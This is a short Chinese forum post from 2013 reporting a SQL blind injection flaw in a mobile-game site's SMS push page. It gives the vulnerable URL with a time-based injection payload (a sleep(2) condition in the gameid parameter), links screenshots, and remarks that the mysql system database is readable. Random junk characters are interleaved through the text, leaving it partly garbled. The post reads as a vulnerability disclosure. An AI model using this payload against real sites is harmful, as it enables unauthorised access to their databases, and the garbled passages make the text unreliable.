简要描述:" ]1 B, H1 O* U* U. S
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
; g' F4 w" L/ M2 _6 T* Q; W, o9 c* J# Q+ {- w
详细说明:
0 u$ k% v7 a/ k) o# W* \0 E/ C存在SQL盲注url:. v* ~, X" J0 d7 f* r* ]& O
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=15 j9 P7 L3 ^5 ^2 Z% w# x$ q$ |, N
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png! P8 s& r- |! \, W
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png3 V: }7 T* \ i8 _4 m
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
9 }- _8 q( f1 q1 f( U( p' `+ \. X6 ]( O4 c1 t4 J( W
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对